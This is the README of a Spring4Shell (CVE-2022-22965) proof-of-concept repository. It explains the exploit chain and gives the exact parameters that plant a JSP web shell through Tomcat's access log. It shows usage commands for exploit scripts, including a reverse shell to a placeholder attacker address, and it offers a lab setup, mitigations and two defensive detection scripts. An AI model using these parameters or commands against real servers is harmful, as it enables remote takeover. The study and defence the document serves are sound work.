march0n/PoC-CVE-2022-22965-Spring4Shell
GitHub: march0n/PoC-CVE-2022-22965-Spring4Shell
Stars: 0 | Forks: 0
# PoC — CVE-2022-22965 (Spring4Shell)
Study and proof-of-concept for CVE-2022-22965, a critical Remote Code Execution (RCE) vulnerability
in Spring Framework, publicly disclosed in April 2022.
## Vulnerability Overview
**Spring4Shell** affects Spring MVC and Spring WebFlux applications that bind request parameters to Java objects. The exploit chain used in this repository requires all of the following conditions to hold (Spring's advisory describes them as prerequisites for this specific exploit and warns that the underlying bug is more general, so other paths to it may exist):
| Condition | Value |
|---|---|
| JDK version | 9 or higher (the `class.module` hop goes through `java.lang.Module`, which only exists from JDK 9) |
| Application server | Apache Tomcat (the path ends in Tomcat's `AccessLogValve`) |
| Packaging | Traditional WAR deployed to Tomcat (not a Spring Boot executable JAR with embedded Tomcat) |
| Spring Framework | 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, or an older unsupported version |
### How it works
Spring's data binding maps HTTP request parameters onto the properties of a model object using dot-separated property paths (e.g., `user.name=foo`). Every Java object exposes `getClass()`, so the path `class` reaches the model's `java.lang.Class`. The fix for CVE-2010-1622 stopped Spring from binding `class.classLoader`, but JDK 9 added `Class.getModule()`, and `Module.getClassLoader()` reopens the same door one hop later, which is why the attack needs JDK 9 or newer:

```
class.module.classLoader.resources.context.parent.pipeline.first.
```

On Tomcat the class loader reached this way is the web application's `WebappClassLoader`. Its `resources` property leads to the application's `StandardContext`, whose `parent` is the `StandardHost`, and in a stock `server.xml` the `first` valve of the host's `pipeline` is the `AccessLogValve`. That valve's configuration is writable at runtime: by setting `pattern`, `directory`, `prefix`, `suffix` and `fileDateFormat`, the attacker points the access log at a `.jsp` file under the web root and makes each logged line the JSP source of their choice. Tomcat compiles and serves that file like any other JSP, which turns the "log file" into a **web shell**.
### Attack flow
1. `POST /vulnerable` with a form body that rebinds the valve (shown one parameter per line; in the request they are `&`-joined). `pattern` carries the JSP source that will be written, `directory` is resolved relative to `CATALINA_BASE`, and an empty `fileDateFormat` stops Tomcat from appending a date stamp to the filename:

   ```
   class.module.classLoader.resources.context.parent.pipeline.first.pattern=
   class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
   class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
   class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
   class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
   ```

2. When Tomcat next writes an access-log entry (in practice the exploit request itself), it opens the "log" at `webapps/ROOT/shell.jsp` and appends the entry, which is the injected payload.
3. `GET /shell.jsp?cmd=id` (served from the `ROOT` context, not from `/vulnerable`) compiles and runs the planted JSP → RCE.
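To make the traversal and the file-naming step concrete, the following script (added here as an example; it is not one of the repository's exploit scripts) parses a captured request body like the one in step 1, lists the `AccessLogValve` properties it rebinds, and predicts the file Tomcat will write using the valve's own rule: `<directory>/<prefix><dateStamp><suffix>`, with an empty date stamp when `fileDateFormat` is empty and a relative `directory` resolved against `CATALINA_BASE`. The sample bodies are constructed for the example, the `pattern` value is left empty as in the listing above, and `/usr/local/tomcat` as `CATALINA_BASE` is an assumption that matches the official `tomcat` Docker image used by the lab.

```python
"""Triage of a captured Spring4Shell request body (added example, not a
repository exploit script)."""
import posixpath
from urllib.parse import parse_qsl

# Binding path from the attack flow; whatever follows it names a valve property.
VALVE_PATH = "class.module.classLoader.resources.context.parent.pipeline.first."

# Stock Tomcat server.xml / AccessLogValve defaults, used for properties a
# request leaves untouched.
VALVE_DEFAULTS = {
    "directory": "logs",
    "prefix": "localhost_access_log",
    "suffix": ".txt",
    "fileDateFormat": ".yyyy-MM-dd",
}

# CATALINA_BASE of the official tomcat Docker image (assumption for the demo).
DEFAULT_CATALINA_BASE = "/usr/local/tomcat"

# Constructed sample: step 1 of the attack flow as a single form body. The JSP
# text that goes into `pattern` is omitted here, as in the README listing.
ATTACK_BODY = "&".join([
    VALVE_PATH + "pattern=",
    VALVE_PATH + "suffix=.jsp",
    VALVE_PATH + "directory=webapps/ROOT",
    VALVE_PATH + "prefix=shell",
    VALVE_PATH + "fileDateFormat=",
])

# Constructed sample: the same request with part of the binding path
# percent-encoded. Tomcat decodes parameter names once, so it binds exactly
# like ATTACK_BODY even though a raw-text search for "class.module" misses it.
ENCODED_BODY = ATTACK_BODY.replace("class.module", "class%2Emodule")

# Constructed sample: ordinary form binding, nothing to report.
BENIGN_BODY = "user.name=foo&user.email=foo%40example.org"


def extract_valve_settings(body):
    """Return {property: value} for every parameter under VALVE_PATH.

    parse_qsl performs the single percent-decode the container applies to
    parameter names, so encoded spellings of the path are recognised.
    """
    settings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.startswith(VALVE_PATH):
            settings[name[len(VALVE_PATH):]] = value
    return settings


def predicted_log_file(settings, catalina_base=DEFAULT_CATALINA_BASE):
    """Path AccessLogValve opens after the rebinding (default rotatable=true)."""
    cfg = {**VALVE_DEFAULTS, **settings}
    directory = cfg["directory"]
    if not posixpath.isabs(directory):
        directory = posixpath.join(catalina_base, directory)
    # An empty fileDateFormat formats to an empty date stamp; otherwise the
    # stamp is only known at write time, so keep the format as a placeholder.
    stamp = "" if cfg["fileDateFormat"] == "" else "<%s>" % cfg["fileDateFormat"]
    return posixpath.normpath(
        posixpath.join(directory, cfg["prefix"] + stamp + cfg["suffix"]))


def triage(body, catalina_base=DEFAULT_CATALINA_BASE):
    """Summarise what a request body does to the valve; None if it is benign."""
    settings = extract_valve_settings(body)
    if not settings:
        return None
    path = predicted_log_file(settings, catalina_base)
    return {
        "properties_set": sorted(settings),
        "predicted_file": path,
        # A .jsp/.jspx under webapps/ is compiled and served: a planted shell.
        "plants_jsp": path.lower().endswith((".jsp", ".jspx"))
        and "/webapps/" in path,
    }


if __name__ == "__main__":
    for label, body in (("attack", ATTACK_BODY), ("encoded", ENCODED_BODY),
                        ("benign", BENIGN_BODY)):
        print(label, triage(body))
```

Run against a real capture, the predicted path is the first place to look on the host; the percent-encoded sample is there to show why the check has to run on decoded parameter names rather than on the raw body.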
## Repository Structure
```
.
├── exploits/
│   ├── exploit1.py    # POST-based web shell with password protection
│   ├── exploit2.py    # POST-based web shell with reset capability
│   ├── exploit3.py    # GET-based variant (simplified)
│   ├── exploit4.py    # Reverse TCP shell (GET-based)
│   └── exploit4b.py   # Reverse TCP shell (POST-based)
└── springmvc5-helloworld-example/
    ├── Dockerfile     # Uses pre-built tomcat:9.0.60 image
    ├── Dockerfile2    # Builds from openjdk:11 + downloads Tomcat
    ├── pom.xml        # Maven project: Spring MVC 5.3.17 (vulnerable)
    └── src/           # Vulnerable Spring MVC application source
```
## Exploit Variants
| Script | Method | Payload | Notes |
|---|---|---|---|
| `exploit1.py` | POST | Web shell (password-protected) | Single request |
| `exploit2.py` | POST | Web shell | Resets log config before/after exploit |
| `exploit3.py` | GET | Web shell (no password) | Parameters via query string |
| `exploit4.py` | GET | Reverse TCP shell | msfvenom-based JSP payload |
| `exploit4b.py` | POST | Reverse TCP shell | Same payload as `exploit4.py`, POST variant |
### Usage example
```bash
# Web shell
python3 exploits/exploit1.py http://target:8080/vulnerable

# Reverse shell (start the listener first: nc -lvnp 4444);
# <attacker-ip> is the address the listener is reachable on
python3 exploits/exploit4.py --url http://target:8080/vulnerable --lhost <attacker-ip> --lport 4444
```
## Lab Setup
### Prerequisites
- Java 11+
- Maven (`sudo apt install maven` or `sudo dnf install maven`)
- Docker (optional, recommended)
### Build
```bash
cd springmvc5-helloworld-example
mvn clean package
```
### Run with Docker
```bash
# Option 1: pre-built Tomcat image
docker build -t spring4shell .
docker run -p 8082:8080 spring4shell

# Option 2: build from openjdk and download Tomcat
docker build -t spring4shell -f Dockerfile2 .
docker run -p 8082:8080 spring4shell
```
The application is then available at `http://localhost:8082/vulnerable`.
## Mitigation
- **Upgrade Spring Framework** to 5.3.18+ or 5.2.20+ (the fixed releases)
- **Upgrade Spring Boot** to 2.6.6+ or 2.5.12+ (these pull in the fixed framework)
- **Upgrade Apache Tomcat** to 10.0.20, 9.0.62 or 8.5.78 or later; these releases harden the class loader's `resources` exposure and close this particular path on the container side, but they are defence in depth, not a substitute for the framework fix
- If upgrading is not immediately possible:
  - Run on JDK 8, which has no `java.lang.Module` and therefore no `class.module` hop
  - Register a global `@ControllerAdvice` whose `@InitBinder` method calls `WebDataBinder.setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*")`, the patterns from Spring's advisory; controllers that set their own disallowed fields in a local `@InitBinder` override the global list and need the same patterns added
  - Deploy a WAF rule blocking parameter names containing `class.`, `Class.`, `module.` or `classLoader`; match on decoded parameter names, because the container decodes `class%2Emodule` before Spring binds it, and treat the rule as a stopgap rather than a fix
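Both interim measures come down to screening parameter names, and the difference between screening decoded names and screening raw request text is where a WAF rule goes wrong. The following script (added here as an example; it is neither Spring's code nor one of this repository's scripts) applies the four disallowed-field patterns from Spring's advisory to parameter names after the single percent-decode the container performs, and contrasts that with a substring rule on the raw request text, which a percent-encoded variant of the same request evades. The requests are constructed for the example.

```python
"""Parameter-name screening in the spirit of Spring's interim workaround
(added example; not Spring's or the repository's code)."""
from urllib.parse import parse_qsl

# Disallowed-field patterns from Spring's advisory for CVE-2022-22965.
DISALLOWED_FIELDS = ("class.*", "Class.*", "*.class.*", "*.Class.*")

# Tokens of the WAF rule suggested in the Mitigation section.
RAW_TOKENS = ("class.", "Class.", "module.", "classLoader")

VALVE_PATH = "class.module.classLoader.resources.context.parent.pipeline.first."

# Constructed sample requests as (query string, form body) pairs.
PLAIN_ATTACK = ("", VALVE_PATH + "suffix=.jsp&" + VALVE_PATH + "prefix=shell")
# Same parameters with every '.' and the 'L' of classLoader percent-encoded.
# The container decodes them to the identical names; a raw-text rule does not.
ENCODED_ATTACK = ("", PLAIN_ATTACK[1].replace(".", "%2E")
                  .replace("classLoader", "class%4Coader"))
# The same getter reached through a nested form property.
NESTED_ATTACK = ("form.class.module.classLoader.resources=x", "")
# Legitimate binding; note 'className' must not trip the '*.class.*' pattern.
BENIGN = ("page=2", "user.name=foo&user.className=Admin")


def simple_match(pattern, name):
    """The subset of Spring's PatternMatchUtils.simpleMatch these patterns
    need: a leading and/or trailing '*' is a wildcard, nothing else is."""
    if pattern.startswith("*") and pattern.endswith("*"):
        return pattern[1:-1] in name
    if pattern.startswith("*"):
        return name.endswith(pattern[1:])
    if pattern.endswith("*"):
        return name.startswith(pattern[:-1])
    return pattern == name


def disallowed_parameter_names(query, body):
    """Parameter names (decoded once, as the container does) that the
    disallowed-field patterns would refuse to bind."""
    hits = []
    for raw in (query, body):
        for name, _value in parse_qsl(raw, keep_blank_values=True):
            if any(simple_match(p, name) for p in DISALLOWED_FIELDS):
                hits.append(name)
    return hits


def raw_substring_rule(query, body):
    """WAF-style rule applied to the undecoded request text."""
    text = query + "&" + body
    return any(tok in text for tok in RAW_TOKENS)


def screen(query, body):
    """Verdict of both approaches for one request."""
    return {
        "decoded_rule": bool(disallowed_parameter_names(query, body)),
        "raw_rule": raw_substring_rule(query, body),
    }


if __name__ == "__main__":
    for label, req in (("plain", PLAIN_ATTACK), ("encoded", ENCODED_ATTACK),
                       ("nested", NESTED_ATTACK), ("benign", BENIGN)):
        print(label, screen(*req))
```

The `*.class.*` pattern is what catches the nested form of the path, and the encoded request is the one a raw-text rule lets through; a WAF or filter that only sees the wire bytes needs its own decoding step before matching.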
## References
- [CVE-2010-1622 — original Spring ClassLoader exploit (2010)](http://blog.o0o.nu/2010/06/cve-2010-1622.html)
- [Initial Chinese disclosure (Weixin)](https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw)
- [Microsoft Security Blog — SpringShell guidance](https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/)
- [LunaSec — Spring RCE vulnerabilities analysis](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)
- [Palo Alto Unit 42 — CVE-2022-22965 deep dive](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/)